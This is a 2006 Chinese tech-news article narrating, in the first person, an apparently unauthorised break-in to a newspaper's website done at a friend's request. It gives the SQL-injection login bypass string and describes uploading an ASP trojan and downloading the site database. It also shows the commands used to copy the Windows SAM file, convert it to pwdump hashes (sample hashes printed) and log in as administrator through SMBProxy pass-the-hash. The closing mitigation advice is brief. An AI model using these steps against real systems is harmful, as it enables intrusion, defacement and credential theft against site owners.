科技时代新浪首页 > 科技时代 > 学园 > 病毒与杀毒专区专题 > 正文

一次用ASP页面漏洞引发的渗透攻击


http://www.sina.com.cn 2006年08月21日 09:55 赛迪网

  最近几天,网络上好像总是不太平,自从WebDAV漏洞的溢出工具发布之后,网上潜在的“肉鸡”好像慢慢多了起来。虽然补丁也已经发布多日,但是还是有人没有放在心上……

  但是我今天要讲的并不是WebDAV漏洞的溢出攻击,而是一次用asp叶面漏洞引发的渗透攻击。

  前天晚上,一个多日不见的朋友,忽然在网上Q我(因为他是广东人,所以我以为他住院了,呵呵),聊了一会突然给了我一个地只要我看看,问我能不能得到发布新闻的权限……

  老套路,ping一下域名得到IP地址,使用SuperScan进行端口扫描,呵呵,还是开了不少啊。

  21、25、53、80、110、139、445、3389等等。

  一个一个分析:

  1、开ftp是为了便于更新web资料吧!没有弱口令……

  2、53 Domain Name System 看来有可能是控制器(逼急了就用RPC溢出,呵呵暴力倾向)。

  3、Telnet Targetip 80 看看,

  HTTP/1.1 400 Bad Request

  Server: Microsoft-IIS/5.0

  Date: Mon, 05 May 2003 14:22:00 GMT

  Content-Type: text/html

  Content-Length: 87

  ErrorThe parameter is incorrect.

  失去了跟主机的连接。

  呵呵 IIS5.0 …… 可惜啊,没有WedDAV溢出漏洞。不错!网管很负责,已经贴好补丁了!值得表扬……

  4、139、445

  不错 还有NetBIOS和IPC$共享不错,刺探了一下,得到了用户名和共享列表。

  5、3389

  没有

紫光
输入法
又是windows2000+sp3+ W2K_sp4_x86_CN 别想了 等拿到administrator的权限再说吧!

  看来从这些方面考虑,暂时是行不通的了。于是我打开了网站的主页,看看是某日报的网站,呵呵!新闻很多啊!看看,是ASP的界面,很好的东东与法简单、可读性强,但是漏洞也不少,多是由于编程者的疏忽造成的,好办让我来浏览一下整个网站……

  管理页面在哪里?试一下吧(社会工程学初级应用)!

  http://www.target.net/admin/ 没有 啊 无法显示

  http://www.target.net/admin.asp 不行

  http://www.target.net/manger.asp 嗯?出来了……

  http://www.target.net/pass.asp 回头一看……哦?不是朋友提供的地址吗?

  看看吧!要我输入用户名和密码,嗯——是个难题,呵呵,原来他就是想要这个啊!好!试试这个:在密码栏里面我输入了asp’or’1呵呵,进去了!为什么?来看这个!

  在ASP程序中,用户名和密码的校验是通过这样的MSSQL语句实现的:

  mydsn=” select * from user where user =’ ”&user&” ’ and pwd = ‘ ”&pwd&” ’ ” 如果”&pwd&”变成了asp’or’1意味着什么?带入看看

  mydsn=” select * from user where user =’ ”&user&” ’ and pwd = ‘ asp ’ or ’ 1 ’ ” 这些罗计算都是同级的从左到右看”&user&” and pwd = ‘ asp ’ 运算的结果为0 ,0 or 1 的结果是1 呵呵 所以就通过了!

  进去之后干什么?由于看到发布文章的同时可是粘贴图片附件,嘿嘿!我来看看,打开发表文章的页面果然有上传附件的地方,看来运气不错(不要高兴得太早,还不知道能上传什么哪)!点击粘贴附件,嘿嘿看到了什么现实的时候没有扩展名的过滤,是所有文件,意味着什么?哈哈!上传的文件当然也是所有类型啦!

  我上传了ASP木马,系统自动编号了。01090208.asp呵呵,问题在哪里呢?来找一找……头大!又是动脑思考的时候了。看看他的数据库吧!于是……

  http://www.target.net/data/ 不错!您没有权限…… 哈哈 原来真在这里啊!再试!

  http://www.target.net/data/database.mdb 没有找到文件

  http://www.target.net/data/target.mdb 嗯!行了!下载下来看!

  呵呵!里面由用户列表、文章列表、还有系统统计——要的就是它!哈!果然找到了,01090208.asp的绝对路径就在里面,好,输入到浏览器里面看看……出来了!

  [img]/UpLoadFiles/NewsPhoto/a5_885_1.jpg[/img]

  好!copy SAM文件到网页根目录下载,在命令行里面输入:

  copy d:\winnt\repair\sam e:\www.target.net\sam._

  已成功复制1个文件,好了,在浏览器里面输入:

  http://www.target.net/sam._

  下载完毕……

  下一步?LC4破解?不不!用新方法SMBProxy 登录!嘻嘻!新东西!

  简介:

  如果拿到一个远程主机NTLMHash密码信息, 一般都会使用暴力破解来获取密码,这个程序可以使用proxy方式与远程主机验证登陆,来达到快速进入的目的.

  SMBProxy程序只认可pwdump格式的密码信息,LC格式不行,所以要将我得到的SAM文件转换为pwdump格式。

  pwdump格式转换方法

  先打开LC3,将SAM文件导入程序,随便选择一个模式进行破解,停止破解。

  [img]/UpLoadFiles/NewsPhoto/5_885_19.jpg[/img]

  将项目保存为LC3的文件格式——*.lcs。

  使用SMBProxy自带的工具将LC格式的文件转换为pwdump格式。

  E:\>perl lc3_conv.pl 2.lcs

  Administrator:500:89B9639B628096295FBE6BDC86679876:C6EBC896A3C134D4CF18063C33ACC926:::

  Guest:501:4316EDA750394C6B120438C30F7F1819:00000000000000000000000000000000:::

  TsInternetUser:1000:1987DC7B3DE4A42761541729CD9CDFDD:28212D01DDEF0A91BA9022173515E9A6:::

  …………………………

  转换完毕

  1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口

  net stop server

  2. 运行本程序

  smbproxy -s target -f pwdump3.txt 好了

  3. 通过本地代理登陆远程主机

  net use * \127.0.0.1\c$ 123456/user:administrator

  哈!成功!

  其实,不用SMBProxy也只不过是为了快一点登录,使用LC4破解也是可行的,主要还是因为我很懒……

  擦出了痕迹,归还了权限,我就撤退了,呵呵!

  后记:关于ASP漏洞的补救,我不是很在行,只是提一些建议吧!

  将user = Trim(Request(“user”))改为user = Replace(Trim(Request(“user”)),” ”,” ’ ”) 以实现 ” ‘ ” 的过滤(被替换为空格)。

  数据库的下载是我猜解的,但是有这样的一种方法是绝对可行的。ASP使用一个连接文件将数据导入数据库文件这个文件一般以inc为扩展名,而且一般命名为conn.inc如果将它下载下来,就意味着数据库路径的暴露,所以要将conn..inc改为asp后缀,同时把数据库文件也改为asp扩展名并修改连接文件中的相关语句。

  对于上传文件限制的代码,我就不太懂了,不过有很多资料啊!

  其实系统的安全只不过是站点安全的一个重要组成部分,服务程序(web页面)的漏洞也会导致系统安全防线的崩溃,这次渗透功击就是一个例子。

  (t116)

发表评论

爱问(iAsk.com) 相关网页共约175,000,000



评论】【论坛】【收藏此页】【 】【多种方式看新闻】【下载点点通】【打印】【关闭




科技时代意见反馈留言板 电话:010-82628888-5595   欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

Copyright © 1996 - 2006 SINA Inc. All Rights Reserved

新浪公司 版权所有